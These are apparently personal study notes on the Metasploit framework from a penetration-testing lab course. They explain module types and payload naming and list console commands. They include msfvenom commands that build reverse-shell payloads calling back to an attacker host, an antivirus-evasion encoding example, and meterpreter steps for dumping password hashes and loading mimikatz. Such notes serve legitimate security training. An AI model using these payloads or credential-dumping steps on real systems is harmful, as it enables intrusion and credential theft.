Auxiliary: Any supporting module, such as scanners, crawlers and fuzzers, can be found here.
Encoders: Encoders will allow you to encode the exploit and payload in the hope that a signature-based antivirus solution may miss them.
Evasion: While encoders will encode the payload, they should not be considered a direct attempt to evade antivirus software.
Exploits: Exploits, neatly organized by target system.
NOPs: NOPs (No OPeration) do nothing, literally.
Payloads: Payloads are codes that will run on the target system.
You will see three different directories under payloads: singles, stagers and stages.
- Singles: Self-contained payloads (add user, launch notepad.exe, etc.) that do not need to download an additional component to run.
- Stagers: Responsible for setting up a connection channel between Metasploit and the target system. Useful when working with staged payloads. “Staged payloads” will first upload a stager on the target system then download the rest of the payload (stage). This provides some advantages as the initial size of the payload will be relatively small compared to the full payload sent at once.
- Stages: Downloaded by the stager. This will allow you to use larger sized payloads.
Metasploit has a subtle way to help you identify single (also called “inline”) payloads and staged payloads.
- generic/shell_reverse_tcp
- windows/x64/shell/reverse_tcp
Both are reverse Windows shells. The former is an inline (or single) payload, as indicated by the “_” between “shell” and “reverse”. While the latter is a staged payload, as indicated by the “/” between “shell” and “reverse”.
Post: Post modules will be useful on the final stage of the penetration testing process listed above, post-exploitation.
To search for exploits use "search"
show options - to show different options
show payloads
set - to set any option
unset - to clear it; unset all
setg - set values to be used for all modules; unsetg
exploit/run - run the exploit; exploit -z -- run it in the background
check - will check if the target is vulnerable without exploiting it.
sessions - shows running sessions
sessions -i <id> - interact with a specific session
background - to background the session prompt
systemctl start postgresql
msfdb init
msfconsole
msf6 > db_status
msf6 > workspace
msf6 > workspace -a pentest1
msfvenom -l payloads ### show available payloads
msfvenom --list formats ### list supported output formats
encoders ### with the "-e" parameter; examle ->msfvenom -p php/meterpreter/reverse_tcp LHOST=10.10.186.44 -f raw -e php/base64
handler ### used to receive connections
use exploit/multi/handler
Different payloads:
- Linux Executable and Linkable Format (elf)
- msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=10.10.X.X LPORT=XXXX -f elf > rev_shell.elf
- The .elf format is comparable to the .exe format in Windows. These are executable files for Linux. However, you may still need to make sure they have executable permissions on the target machine. For example, once you have the shell.elf file on your target machine, use the chmod +x shell.elf command to accord executable permissions. Once done, you can run this file by typing ./shell.elf on the target machine command line.
- Windows
- msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.X.X LPORT=XXXX -f exe > rev_shell.exe
- PHP
- msfvenom -p php/meterpreter_reverse_tcp LHOST=10.10.X.X LPORT=XXXX -f raw > rev_shell.php
- ASP
- msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.X.X LPORT=XXXX -f asp > rev_shell.asp
- Python
- msfvenom -p cmd/unix/reverse_python LHOST=10.10.X.X LPORT=XXXX -f raw > rev_shell.py
meterpreter > getpid
meterpreter > ps
msfvenom --list payloads | grep meterpreter ### listing meterpreter payloads
meterpreter > help
meterpreter > hashdump (migrate to lssas.exe process first, than hashdump to get the hashes)
meterpreter > search -f flag2.txt ### search for a specific file
meterpreter > load kiwi ### mimikatz